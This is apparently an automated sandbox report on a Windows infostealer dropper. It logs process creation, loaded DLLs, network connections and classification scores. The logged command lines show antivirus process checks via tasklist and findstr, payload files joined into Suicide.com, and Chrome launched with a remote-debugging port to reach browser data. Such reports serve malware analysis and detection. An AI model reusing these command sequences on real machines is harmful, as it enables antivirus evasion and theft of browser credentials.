    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49784 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 5.75.212.196:443 -> 192.168.2.4:49790 version: TLS 1.2
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeFile created: C:\Windows\FirmwareRobinsonJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeFile created: C:\Windows\PetersburgTrailerJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_0040737E0_2_0040737E
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406EFE0_2_00406EFE
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_004079A20_2_004079A2
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_004049A80_2_004049A8
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\402438\Suicide.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: String function: 004062CF appears 58 times
    Source: Yn13dTQdcW.exeStatic PE information: invalid certificate
    Source: Yn13dTQdcW.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@38/37@5/5
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\MGL5JUO3.htmJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeFile created: C:\Users\user\AppData\Local\Temp\nsc85E8.tmpJump to behavior
    Source: Yn13dTQdcW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: chrome.exe, 00000010.00000002.2727001205.000078C400540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
    Source: I5P8GL68G.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: Yn13dTQdcW.exeReversingLabs: Detection: 34%
    Source: Yn13dTQdcW.exeVirustotal: Detection: 22%
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeFile read: C:\Users\user\Desktop\Yn13dTQdcW.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Yn13dTQdcW.exe "C:\Users\user\Desktop\Yn13dTQdcW.exe"
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 402438
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com Suicide.com N
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2344,i,2585248863302198166,5180447785711478511,262144 /prefetch:8
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 402438Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue NJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\402438\Suicide.com Suicide.com NJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2344,i,2585248863302198166,5180447785711478511,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Yn13dTQdcW.exeStatic file information: File size 1192690 > 1048576
    Source: Yn13dTQdcW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: Yn13dTQdcW.exeStatic PE information: real checksum: 0x1208a0 should be: 0x12bf72

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\402438\Suicide.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\402438\Suicide.comJump to dropped file
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\402438\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\402438Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: chrome.exe, 00000010.00000002.2725188272.000078C4000EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
    Source: chrome.exe, 00000010.00000002.2732042827.000078C400D94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=5a068a65-a8ff-4209-bb88-52f3be1d2e9fx
    Source: chrome.exe, 00000010.00000002.2731250474.000078C400CB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
    Source: chrome.exe, 00000010.00000002.2732042827.000078C400D94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=5a068a65-a8ff-4209-bb88-52f3be1d2e9f
    Source: chrome.exe, 00000010.00000002.2717834194.000001C1D5E1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\AppData\Local\Temp\402438\Suicide.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\Yn13dTQdcW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 402438Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording Jump to behavior
